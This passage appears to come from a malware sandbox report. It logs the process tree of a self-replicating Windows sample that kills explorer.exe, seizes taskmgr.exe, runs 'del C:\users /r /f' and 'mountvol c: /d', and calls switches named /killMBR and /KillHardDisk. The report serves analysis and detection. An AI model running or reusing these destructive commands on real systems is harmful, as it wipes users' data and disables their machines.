        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /save 1699084438
        11⤵
        Executes dropped EXE
        
        PID:5376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /protect 1699084438
        10⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /protect 1699084438
        11⤵
        
        PID:3828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe+710299.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900517.exe
        12⤵
        
        PID:6884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900517.exe 1699084438
        12⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900517.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900517.exe 1699084438
        13⤵
        
        PID:8748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:8592
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:9424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe+818451.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900518.exe
        12⤵
        
        PID:8928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900518.exe 1699084438
        12⤵
        
        PID:8256
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900518.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900518.exe 1699084438
        13⤵
        
        PID:10100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /save 1699084438
        10⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /save 1699084438
        11⤵
        
        PID:5404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+25452.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        8⤵
        
        PID:4416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe 1699084438
        8⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe 1699084438
        9⤵
        Executes dropped EXE
        
        PID:5560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:6372
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /autoup 1699084438
        10⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /autoup 1699084438
        11⤵
        
        PID:4044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /killwindows 1699084438
        10⤵
        
        PID:8304
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /killwindows 1699084438
        11⤵
        
        PID:11384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7524
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:7540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11920
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /KillHardDisk 1699084438
        11⤵
        
        PID:11940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:9544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:11344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /killMBR 1699084438
        10⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /killMBR 1699084438
        11⤵
        
        PID:7852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /protect 1699084438
        10⤵
        
        PID:11948
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /protect 1699084438
        11⤵
        
        PID:6368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe+717157.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900527.exe
        12⤵
        
        PID:9932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /autoup 1699084438
        10⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe /autoup 1699084438
        11⤵
        
        PID:10548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890052.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:13492
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:4020
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        6⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:1144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+812912.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890058.exe
        8⤵
        
        PID:940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890058.exe 1699084438
        8⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890058.exe 1699084438
        9⤵
        Executes dropped EXE
        
        PID:5620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:6948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+925086.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        8⤵
        
        PID:6432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe 1699084438
        8⤵
        
        PID:7236
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe 1699084438
        9⤵
        
        PID:9964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /autoup 1699084438
        10⤵
        
        PID:11312
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /autoup 1699084438
        11⤵
        
        PID:11616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /killwindows 1699084438
        10⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /killwindows 1699084438
        11⤵
        
        PID:5684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:12264
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:13848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /KillHardDisk 1699084438
        10⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /KillHardDisk 1699084438
        11⤵
        
        PID:11400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /killMBR 1699084438
        10⤵
        
        PID:10956
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /killMBR 1699084438
        11⤵
        
        PID:12396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890059.exe /protect 1699084438
        10⤵
        
        PID:12796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        6⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:4660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        6⤵
        
        PID:780
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+712390.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890057.exe
        8⤵
        
        PID:2932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        6⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        7⤵
        Executes dropped EXE
        
        PID:1648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        6⤵
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:5948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+473.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        8⤵
        
        PID:2584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe 1699084438
        8⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe 1699084438
        9⤵
        
        PID:9212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /autoup 1699084438
        10⤵
        
        PID:9660
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /autoup 1699084438
        11⤵
        
        PID:9576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /killwindows 1699084438
        10⤵
        
        PID:9556
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /killwindows 1699084438
        11⤵
        
        PID:556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:11920
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11776
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /KillHardDisk 1699084438
        11⤵
        
        PID:4948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:6464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:12340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /killMBR 1699084438
        10⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /killMBR 1699084438
        11⤵
        
        PID:10564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /protect 1699084438
        10⤵
        
        PID:12260
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /protect 1699084438
        11⤵
        
        PID:7128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe+127906.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900541.exe
        12⤵
        
        PID:8724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /autoup 1699084438
        10⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe /autoup 1699084438
        11⤵
        
        PID:12404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890054.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+52744.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890055.exe
        8⤵
        
        PID:8900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890055.exe 1699084438
        8⤵
        
        PID:10572
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890055.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890055.exe 1699084438
        9⤵
        
        PID:10804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        6⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /save 1699084438
        7⤵
        
        PID:6480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6760
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+330367.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
      4⤵
      PID:4672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe 1699084438
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2820
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe 1699084438
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        6⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        
        PID:1208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+812912.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        8⤵
        
        PID:3860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe 1699084438
        8⤵
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe 1699084438
        9⤵
        Executes dropped EXE
        
        PID:5612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:6272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /killwindows 1699084438
        10⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /killwindows 1699084438
        11⤵
        
        PID:2940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:7696
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:11144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /autoup 1699084438
        10⤵
        
        PID:9640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /KillHardDisk 1699084438
        10⤵
        
        PID:11976
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /KillHardDisk 1699084438
        11⤵
        
        PID:11916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:7140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:12956
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        13⤵
        
        PID:3828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /killMBR 1699084438
        10⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /killMBR 1699084438
        11⤵
        
        PID:5056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /protect 1699084438
        10⤵
        
        PID:11900
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /protect 1699084438
        11⤵
        
        PID:6380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe+46932.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900384.exe
        12⤵
        
        PID:3784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /autoup 1699084438
        10⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /autoup 1699084438
        11⤵
        
        PID:12808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289003.exe+925086.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890039.exe
        8⤵
        
        PID:6464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890039.exe 1699084438
        8⤵
        
